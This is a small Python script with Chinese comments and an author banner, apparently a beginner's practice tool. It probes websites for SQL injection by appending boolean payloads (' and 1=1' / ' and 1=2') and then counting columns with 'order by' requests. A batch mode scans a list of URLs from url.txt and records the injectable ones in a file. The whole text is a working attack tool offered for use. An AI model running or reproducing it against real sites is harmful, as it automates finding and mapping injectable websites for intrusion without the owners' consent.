# -*- coding:utf-8 -*- def logo(): print (" *** ") print (" * * ") print (" author: * * ") print (" Screw * ") print (" ***** ") print (" * ") print (" * * ") print (" blog: * * ") print (" *** ") print (" http://www.cnblogs.com/pojun/ ") #运行环境python3.0 批量的话,在本目录建一个url.txt文件将注入点导入。 import threading import requests i=0 err='true' exp=[' and 1=1',' and 1=2'] chang=[] new_str="" #判断注入点 def judge(): for i in range(2): request=url+exp[i] try: respons1=len(requests.get(request).text) except: print(u"网站有waf,连接被重置!") exit() chang.append(respons1) if(chang[1]!=chang[0]): print(u'网站======>存在注入!') field(url) else: print(u'网站=======>" 不 "存在注入!') #判断字段(field) def field(weburl): j=0 a1="" a2="" while j<30: j+=1 if(j%2!=0): request=weburl+" order by "+str(j) try: a1=len(requests.get(request,timeout=1).text) except: pass else: request=weburl+" order by "+str(j) try: a2=len(requests.get(request,timeout=1).text) except: print(u"网站有waf,连接被重置!") if(a1!=a2 and j>1): print(u"字段数为========================>",j-1) break #批量 def piliang(): str=open('url.txt',encoding="utf-8").read() a=str.split(' ') url_num=len(a) for i1 in range(url_num-1): chang=[] print (a[i1]) for i2 in range(2): request=a[i1]+exp[i2] try: respons1=len(requests.get(request,timeout=1).text) except: global err err='false' print(u"网站有waf,连接被重置!") break if err=='true': chang.append(respons1) if err=='true': if(chang[1]==chang[0]): print(u'网站========>" 不 "存在注入!') else: print(u'网站========>存在注入!') # field(a[i1]) new_str=a[i1]+' ' o=open('ture_sql.txt','a') o.write(new_str) err='true' print(u'1.批量注入,存在本目录的1.txt 2.单点注入,并判断字段数 ') id=int(input("ID? :")) if(id==1): t1=threading.Thread(target=piliang) t1.start() t1.join() elif(id==2): url=input('url :') judge() t2=threading.Thread(target=field,args=(url,)) t2.join() else: print(u"输入错误!") logo()
本脚本是在自己学完python练手的第一个脚本,所以结构比较混乱,但是效果还是不错的。基本没有误报!